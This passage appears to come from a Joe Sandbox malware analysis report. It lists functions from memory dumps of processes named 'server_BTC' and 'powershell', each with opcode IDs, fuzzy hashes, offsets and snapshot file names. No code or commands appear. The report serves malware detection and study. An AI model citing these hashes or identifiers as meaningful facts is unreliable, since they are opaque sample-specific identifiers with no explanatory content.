                                                                                                                • Instruction ID: 71b648ebcba3233064fd9468b25ca0c4e3e26db4d88bf2d1e311e970d55b595f
                                                                                                                • Opcode Fuzzy Hash: 99c1484778357df7b8c4f72cfb6a0d7e86c09eb6826433b164b89ee6a0065cef
                                                                                                                • Instruction Fuzzy Hash: 2E310371E0120A8FCB19DBB8D4909EEB7F2BB89304F20856AC415B7394DB365D42CF60
                                                                                                                Function 013B73B0 Relevance: .1, Instructions: 76COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9e35bbbc930b63e7aa810d115d3fc0075dd8c46a48c82456bd83a69f431b61e5
                                                                                                                • Instruction ID: 90ebe9bbb5c5b53f40425c5cce93a61bf133742634d47e7e2d2e83d412b64bca
                                                                                                                • Opcode Fuzzy Hash: 9e35bbbc930b63e7aa810d115d3fc0075dd8c46a48c82456bd83a69f431b61e5
                                                                                                                • Instruction Fuzzy Hash: 8321F271E0120A8BCB18EBA9D590AEEB7F2BF89304F209569C515B7394DB325D81CF61
                                                                                                                Function 013B51F7 Relevance: .1, Instructions: 66COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ec8f90bb0956ed63aea48002710aaa38f57559d66457bc1bcb04e10c3378a3d9
                                                                                                                • Instruction ID: 64967349be1f097ff27d371ab69518f245fd054486988281b1dbe74caa4cea31
                                                                                                                • Opcode Fuzzy Hash: ec8f90bb0956ed63aea48002710aaa38f57559d66457bc1bcb04e10c3378a3d9
                                                                                                                • Instruction Fuzzy Hash: 01218E708093469FC715AFB8D4583AD7FF0EB42315F0548AAC051AB192E7780A85CFA1
                                                                                                                Function 013B842F Relevance: .1, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4fb002a95ce59b9844903cca368e3b08982d294821e3d73d5ec04ba32324859f
                                                                                                                • Instruction ID: 27ddd47bc7054241377a46b49077efd35966bcedc4728a32125ba3bff5e9afae
                                                                                                                • Opcode Fuzzy Hash: 4fb002a95ce59b9844903cca368e3b08982d294821e3d73d5ec04ba32324859f
                                                                                                                • Instruction Fuzzy Hash: AE1104757043429FCB06AB7DD92099E3BB6FF86318B1401A9D101CF3A6DB358C45CB92
                                                                                                                Function 013B5238 Relevance: .0, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ff414d4e935c9b445393681c638fdff0514118cd2c1d5d5d7190650d03ad5c49
                                                                                                                • Instruction ID: 9608b0386ddd5633b3f2c99fbd4e8fb063e00c57b8edad811731f4c3b77dfeb5
                                                                                                                • Opcode Fuzzy Hash: ff414d4e935c9b445393681c638fdff0514118cd2c1d5d5d7190650d03ad5c49
                                                                                                                • Instruction Fuzzy Hash: CF015A70C01209DFDB14EFF8D04C3AEBBF0EB05305F0098AA9525AB680E7780684CF95
                                                                                                                Function 013B8391 Relevance: .0, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3be0e86a74f2762d31e407e79fc65aad21ccb4f1c255cb319cb50da6e994e14c
                                                                                                                • Instruction ID: ead7a875bdf30e6722bf396530b414a2a91352a2f78ccd7f318813a663d0bce5
                                                                                                                • Opcode Fuzzy Hash: 3be0e86a74f2762d31e407e79fc65aad21ccb4f1c255cb319cb50da6e994e14c
                                                                                                                • Instruction Fuzzy Hash: 7401DA70B4131A9FCB69DB34D8507AEB372AF86315F5094E9804A27294CF369DC5CF06
                                                                                                                Function 013B7499 Relevance: .0, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d6157887da5f085b4c8b3bb8fae39372e0e0eaf0c9d78e3e736d55b39f44146f
                                                                                                                • Instruction ID: 9116e4b7f9ade42525d2baa0416d82fd9b704acdb52b60d4ca99dc50ddbe66e0
                                                                                                                • Opcode Fuzzy Hash: d6157887da5f085b4c8b3bb8fae39372e0e0eaf0c9d78e3e736d55b39f44146f
                                                                                                                • Instruction Fuzzy Hash: 08F09AB09402049FC754DFB8E8449A97FB0FB46224F0142AAD804EB772E7384D86CB10
                                                                                                                Function 013B6C3E Relevance: .0, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 932f223e82d50871a43ca5c85af73abe9d52a74c82c3c377b67c53accc043bbc
                                                                                                                • Instruction ID: a21242d1ea3d1076ec073061de0200aeb0f53981c292a1ba819649569a12e35e
                                                                                                                • Opcode Fuzzy Hash: 932f223e82d50871a43ca5c85af73abe9d52a74c82c3c377b67c53accc043bbc
                                                                                                                • Instruction Fuzzy Hash: 20F05EB4900115CFCB64DFA4D4486ACFBB0EB4A302F0060AAD109A7261D7309985CF14
                                                                                                                Function 013B6757 Relevance: .0, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 10b1bcb35326fc7b7de92238c60d692c906ed7b400689387cb8a18bcb9f05032
                                                                                                                • Instruction ID: cd172f39b45c7637cd8748abd8f3451824a841c81e373bbb0d72c6d66d782435
                                                                                                                • Opcode Fuzzy Hash: 10b1bcb35326fc7b7de92238c60d692c906ed7b400689387cb8a18bcb9f05032
                                                                                                                • Instruction Fuzzy Hash: A3E02BB1904245DFCB14DFB0DA466DDBBB1FB42204F0086AEC4099F656D7311F05D741
                                                                                                                Function 013B74A8 Relevance: .0, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 83cab0d888d37770caf7c7bf4b5322cabb08ffb1cb212bdea58cd2ddd89c3b91
                                                                                                                • Instruction ID: ed6d522500ab4a3955e90d18d5fe1e4fa86925780d77c3434f3bb01b51ab2552
                                                                                                                • Opcode Fuzzy Hash: 83cab0d888d37770caf7c7bf4b5322cabb08ffb1cb212bdea58cd2ddd89c3b91
                                                                                                                • Instruction Fuzzy Hash: B7E01AB8A00219DFC758EFB8E588A59BBF0FB49305F1042A9D908A7365E7319D85CB80
                                                                                                                Function 013B6768 Relevance: .0, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1213bdf658e2ad2844352c04c20911d116e0ae07002dd8495325265ed9abb758
                                                                                                                • Instruction ID: 81fd5aa054b2c2cbb0c01dff146cbb1ae50ad223855b961d5b99e70f3a54102a
                                                                                                                • Opcode Fuzzy Hash: 1213bdf658e2ad2844352c04c20911d116e0ae07002dd8495325265ed9abb758
                                                                                                                • Instruction Fuzzy Hash: C8E026B090020AEFCB00EFF5E50565CB7F5FB01204F00856CC509A7200EB711F45D780
                                                                                                                Function 013B7642 Relevance: .0, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6e0df065989e2ef31decde147f802809aa3f22279b5b739ff4c0c1357a5daaa4
                                                                                                                • Instruction ID: b3901f363f6594ded43b1ad4a391d16b5ecd4dbf71e1d9a4c46f421676559725
                                                                                                                • Opcode Fuzzy Hash: 6e0df065989e2ef31decde147f802809aa3f22279b5b739ff4c0c1357a5daaa4
                                                                                                                • Instruction Fuzzy Hash: ACE086708843409FD3558BB46805BB93BB4DB82321F02419ED4149B552D2780C41CB21
                                                                                                                Function 013B6D40 Relevance: .0, Instructions: 18COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8ec2bd835c52cb3efad9f081d1df919a6152dc67222eee16b6690aa23cba1f4b
                                                                                                                • Instruction ID: 229aa4e4930bea85f2edef2990e6929012250f06b89c9fbaed4a83c3a93be8c3
                                                                                                                • Opcode Fuzzy Hash: 8ec2bd835c52cb3efad9f081d1df919a6152dc67222eee16b6690aa23cba1f4b
                                                                                                                • Instruction Fuzzy Hash: 67E0C2B18883818FC3168FA0AA41754BB70AB43306F0651DAC1145F597E7784881C731
                                                                                                                Function 013B7650 Relevance: .0, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e203161c782f70c785d4869e26ec84a39bb2c4c297ec0001b23d2d22b804d292
                                                                                                                • Instruction ID: 7f60423239e6c82585335b7ca1312fca4c3bcbb75995856e08bc9f99ec7185a5
                                                                                                                • Opcode Fuzzy Hash: e203161c782f70c785d4869e26ec84a39bb2c4c297ec0001b23d2d22b804d292
                                                                                                                • Instruction Fuzzy Hash: F3C08070C003099BD334DFF8B409B657BBCD742215F401158E51897741D7714480D7D5
                                                                                                                Function 013B6D50 Relevance: .0, Instructions: 13COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2240444838.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_13b0000_server_BTC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fc8d03372210e6bdad3d09c4498ed9ea43a7f3d255082f3b10d1d381e1ade131
                                                                                                                • Instruction ID: 1f2e3ac107e80444154f0f8dd2c773ef1c79e29c3a59dd9014dcfe9e07fb18fb
                                                                                                                • Opcode Fuzzy Hash: fc8d03372210e6bdad3d09c4498ed9ea43a7f3d255082f3b10d1d381e1ade131
                                                                                                                • Instruction Fuzzy Hash: 39C012B080424A9BD2249BD4A405B65B6ACD702205F40116CD61857605E771458097B5

                                                                                                                Executed Functions

                                                                                                                Function 040EB490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: {Yn^$Yn^
                                                                                                                • API String ID: 0-3084620983
                                                                                                                • Opcode ID: 31942878101b68d06c821d69943ed6c0775063d08cdc104f5713cce16ed87d01
                                                                                                                • Instruction ID: ae61c1717c80c6b5f0698954d6fdf46908214e614f1b63ed489cb74d2476b652
                                                                                                                • Opcode Fuzzy Hash: 31942878101b68d06c821d69943ed6c0775063d08cdc104f5713cce16ed87d01
                                                                                                                • Instruction Fuzzy Hash: 24918EB0B016599FEB19DFB588545AEB7B2EFC8604B00891DD106AB380DF74AE068BD5
                                                                                                                Function 040EDC88 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: +/n^
                                                                                                                • API String ID: 0-2444456302
                                                                                                                • Opcode ID: 0907434324c3473c8f449751b5446f186f095d75a9307d9ff015d0f11d1a1c90
                                                                                                                • Instruction ID: 1fff365051d656390e01f85944744942f1d580b261636bec745904914ce0220a
                                                                                                                • Opcode Fuzzy Hash: 0907434324c3473c8f449751b5446f186f095d75a9307d9ff015d0f11d1a1c90
                                                                                                                • Instruction Fuzzy Hash: DCE092712106226BD3056B2FD840AABBBDEDFC9275710481AE115D7340EFB4E81187E5
                                                                                                                Function 040EDC98 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: +/n^
                                                                                                                • API String ID: 0-2444456302
                                                                                                                • Opcode ID: 760aa78a0f232dd07db5798de2e41e1b3bad90f18eaa1ac76ed7d8a474751058
                                                                                                                • Instruction ID: cddf6c2e2cba5ba10950220490a666fd86343b82f402b426eb59994285401b68
                                                                                                                • Opcode Fuzzy Hash: 760aa78a0f232dd07db5798de2e41e1b3bad90f18eaa1ac76ed7d8a474751058
                                                                                                                • Instruction Fuzzy Hash: 64E0C231700A125B8215A72FA8108AFB7DBDFC4675300882FE119D7340EE64EC0247E9
                                                                                                                Function 06EC2308 Relevance: .6, Instructions: 635COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2298533561.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_6ec0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e3bd7949eda862715be679f5baffa1adcd1f66e1816a613501d01e6166c8d3a3
                                                                                                                • Instruction ID: d05a14061f91d574c58c6018949ee7e998373d09258e6dc4b03c8c650637e3ed
                                                                                                                • Opcode Fuzzy Hash: e3bd7949eda862715be679f5baffa1adcd1f66e1816a613501d01e6166c8d3a3
                                                                                                                • Instruction Fuzzy Hash: 69220635F00305DFEB649F68C9417ABBBE6AF85224F14907EDA05DB251DB31CA42C7A2
                                                                                                                Function 06EC3CE8 Relevance: .6, Instructions: 591COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2298533561.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_6ec0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2d0457cf83450953ec17f4865d457a915a3a4e0e2d64edc8bc0c871961c1e18d
                                                                                                                • Instruction ID: 9dfee51504a561c2e9c54c28d9fda85070607d04f1856065378e725e336b4380
                                                                                                                • Opcode Fuzzy Hash: 2d0457cf83450953ec17f4865d457a915a3a4e0e2d64edc8bc0c871961c1e18d
                                                                                                                • Instruction Fuzzy Hash: A2124531B04351DFD7618B6899217AABFE29FC1224F14906ED545CF392DB32CC46C7A2
                                                                                                                Function 040E29F0 Relevance: .2, Instructions: 209COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5f6f6a9a87e309448fd272246cece3fcd1dd4447cf6b6b2fc50dd683fbd122ab
                                                                                                                • Instruction ID: d14bb3d7666e8fa31ab232efb56bd5108dd7066df087709acf99c41cad851c68
                                                                                                                • Opcode Fuzzy Hash: 5f6f6a9a87e309448fd272246cece3fcd1dd4447cf6b6b2fc50dd683fbd122ab
                                                                                                                • Instruction Fuzzy Hash: 10916974A00209CFCB15CF59C498ABAFBB6FF89310B288599D915AB365C735FC51CBA0
                                                                                                                Function 040E7740 Relevance: .2, Instructions: 158COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f7c257e2fb1d7bc33c215b8d4a87bf73a610cf373593ff6d1547a53e1b3fcefe
                                                                                                                • Instruction ID: e60b831a725cf64b85d99d0429542f53e9f24023ff0e158bd015a69e53c071f2
                                                                                                                • Opcode Fuzzy Hash: f7c257e2fb1d7bc33c215b8d4a87bf73a610cf373593ff6d1547a53e1b3fcefe
                                                                                                                • Instruction Fuzzy Hash: 0D51F5343042059FE705DB7AD844A7A77E6FFC8214B15446AE909EB392EB35EC02CB90
                                                                                                                Function 040EBAB0 Relevance: .2, Instructions: 157COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 380515a1bed1070c3a2e5499e49511fe2d1db544569a21bea7dff8e2e642dc33
                                                                                                                • Instruction ID: f933f70cf41c476d223dd2298b229be2597a804fa76f38e5bc55b9db09b20e25
                                                                                                                • Opcode Fuzzy Hash: 380515a1bed1070c3a2e5499e49511fe2d1db544569a21bea7dff8e2e642dc33
                                                                                                                • Instruction Fuzzy Hash: B96138B0E01248DFDB54CFAAD484A9DFBF5EF88314F14816AE919BB354EB34A941CB50
                                                                                                                Function 040EBAC0 Relevance: .2, Instructions: 155COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8ad0e58656a575317acc1aceb7c8b564dcf1592b31cfbf1c2a470c4c4937cf9e
                                                                                                                • Instruction ID: 223f3c68c8a44cbbb1d0afe8d16d304fe374b5fd07ab2c907029dc1df7061305
                                                                                                                • Opcode Fuzzy Hash: 8ad0e58656a575317acc1aceb7c8b564dcf1592b31cfbf1c2a470c4c4937cf9e
                                                                                                                • Instruction Fuzzy Hash: 8A6115B1E00248DFDB54CFAAC584B9DBBF5EF88314F14816AE919BB254EB34AD41CB50
                                                                                                                Function 06EC3CCC Relevance: .1, Instructions: 129COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2298533561.0000000006EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_6ec0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e914413a5dcf4ac98f66f2998f42696cb8d71ac2e558b228a5e285b337186e65
                                                                                                                • Instruction ID: 93a3340498965c19149fbeab5bc0aa25d4e03870e2abf29829c2c699a5d4b34f
                                                                                                                • Opcode Fuzzy Hash: e914413a5dcf4ac98f66f2998f42696cb8d71ac2e558b228a5e285b337186e65
                                                                                                                • Instruction Fuzzy Hash: 9341FC71E00311DFDB918F648A01BBABFB2AF81228F18D4AED9059F251D731DD46CBA5
                                                                                                                Function 040E6FE0 Relevance: .1, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 860cf7cb5895882fd80c8682a2cd31d4bf593828ba395f57a0b31222c9db1e2b
                                                                                                                • Instruction ID: 77dee443663c4eb3d90816814b56405d73cf9d153146e609179fa9a74b84f4c7
                                                                                                                • Opcode Fuzzy Hash: 860cf7cb5895882fd80c8682a2cd31d4bf593828ba395f57a0b31222c9db1e2b
                                                                                                                • Instruction Fuzzy Hash: 13412B34B04205CFDB55DFA9C498AAEBBF2EB8D310F1554A8E406BB391DA35ED01CB61
                                                                                                                Function 040E2B00 Relevance: .1, Instructions: 108COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 23715f995a5d67ef53d1c9b0bcd8528ea320134cad0a2e248b76f9c935675922
                                                                                                                • Instruction ID: f4ffe1c9957695a64b966c2ecd785669e830564d9472bc2382e01b890cc583e8
                                                                                                                • Opcode Fuzzy Hash: 23715f995a5d67ef53d1c9b0bcd8528ea320134cad0a2e248b76f9c935675922
                                                                                                                • Instruction Fuzzy Hash: 714145B4A00609CFCB05CF4AC5989BAFBB5FF49310B258599D915AB364C736FC61CBA0
                                                                                                                Function 040E6FD1 Relevance: .1, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ade7d3a9d7ec54f9411bdd2e860262cc86a2fbe7b1560051d72e1af9fc6d479a
                                                                                                                • Instruction ID: 7c543a7dd55d264d21e1323e9e01b773721f90116373b416482de4017ce932a7
                                                                                                                • Opcode Fuzzy Hash: ade7d3a9d7ec54f9411bdd2e860262cc86a2fbe7b1560051d72e1af9fc6d479a
                                                                                                                • Instruction Fuzzy Hash: FA310734B04215CFDB54DFA6D498AAEBBF2EB89350F145068E402BB395DB36EC11CB61
                                                                                                                Function 040EC388 Relevance: .1, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ea4ffa2d3e50cf7b990b42fa393250c7cfcfc58735c8d7c720611597e5419e68
                                                                                                                • Instruction ID: a84bfebee96d2e72bfca9af5f8cd5efe073a43b06ff40aeed292f6fa8d89ab63
                                                                                                                • Opcode Fuzzy Hash: ea4ffa2d3e50cf7b990b42fa393250c7cfcfc58735c8d7c720611597e5419e68
                                                                                                                • Instruction Fuzzy Hash: 94319E313002029FE705DB79D894BAEB792EFC4314F048629D60ADB391DF75E846CBA1
                                                                                                                Function 040EAE60 Relevance: .1, Instructions: 89COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000B.00000002.2269158373.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_11_2_40e0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2a75d5f5c408c6738220780c781b4276bbcf734d5f7aeb74504fd20091282b13
                                                                                                                • Instruction ID: e8b2d704e6b036328109d6841fad919d4a6cdc78a38d1b1d52e5f2bc17c1d6ef
                                                                                                                • Opcode Fuzzy Hash: 2a75d5f5c408c6738220780c781b4276bbcf734d5f7aeb74504fd20091282b13
